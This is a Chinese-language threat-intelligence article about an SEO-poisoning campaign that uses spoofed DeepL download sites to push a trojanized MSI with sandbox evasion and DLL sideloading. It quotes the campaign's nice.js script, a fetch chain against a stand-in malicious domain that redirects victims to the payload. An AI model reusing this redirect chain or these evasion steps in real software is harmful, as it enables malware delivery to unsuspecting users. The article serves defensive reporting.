2025年8月,安全研究人员发现了一场针对中文Windows用户的复杂SEO投毒攻击活动。
攻击者通过定制的SEO插件操纵搜索结果排名,并注册相似域名,成功将恶意软件下载网站伪装成合法提供商。
寻找DeepL等热门应用程序的受害者被重定向到伪造页面,这些页面仅做了细微的字符替换,使用的语言也极具迷惑性,诱使他们下载带有恶意程序的安装包,而非正版软件。
这种技术使威胁攻击者无需发送直接的钓鱼邮件或进行除伪造域名之外的社会工程学攻击,就能接触到广泛的受众。
Fortinet的分析师发现了多个在搜索引擎中排名靠前的欺诈性域名,每个域名都旨在分发合法应用程序二进制文件和恶意有效载荷的组合。
访问此类网站时,一个名为nice.js的基于JavaScript的加载器会协调多步骤下载过程,动态获取JSON响应以确定最终的安装程序URL。
这种将恶意软件无缝植入安装流程的方式,使得普通用户几乎无法察觉。
这些武器化安装程序收集到的被盗凭证和系统数据,随后可被用于进一步实施入侵、横向移动或在地下市场出售。
此次活动的影响不仅限于简单的凭证窃取。MSI安装程序一旦执行,就会将自身提升至管理员权限,并将多个组件(包括一个调试链接的DLL、碎片化的ZIP压缩包以及辅助文件)放入系统目录中。
主DLL中的反分析程序会执行父进程检查、通过HTTP日期查询进行睡眠完整性验证以及ACPI表检查,以规避沙箱和虚拟化环境。
只有在完成这些检查后,恶意软件才会重构并解压其有效载荷,以确保在真实的终端用户机器上实现稳定部署。
感染机制
这种感染机制的核心在于嵌入在伪造网站中的nice.js脚本。
页面加载时,该脚本会按如下方式执行一系列请求:-
fetch(`https://spoofeddomain.com/api/download?device=${deviceType}&domain=${currentDomain}`)
.then(response => response.json())
.then(data => fetch(data.secondaryLink))
.then(response => response.json())
.then(data => window.location.href = data.finalUrl);这种基于JSON的重定向链不仅掩盖了恶意内容的传递,还使威胁者能够根据受害者的设备类型和域名来源定制有效载荷。
一旦用户被重定向到最终URL,这个MSI包就会将合法的DeepL安装程序与恶意的EnumW.dll混合在一起,而后者引用了攻击者系统上的一个调试路径。
EnumW.dll 文件会在 Windows Installer 中触发一个自定义操作,以执行其 ooo89 函数,在有效负载提取之前启动 反分析 检查。
碎片化的ZIP归档文件(从temp_data_1到temp_data_55)被重组为一个emoji.dat文件,经过解压后,部署在用户配置文件中一个名为plsamc{systemUptime}的唯一目录下。
随后,通过搜索同级EXE文件来侧载打包的vstdlib.dll,这确保了持久性并使 forensic analysis变得复杂。
此次攻击从最初的搜索结果一直延续到最终的有效载荷执行,凸显了这种搜索引擎优化投毒操作的隐蔽性和复杂性。
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
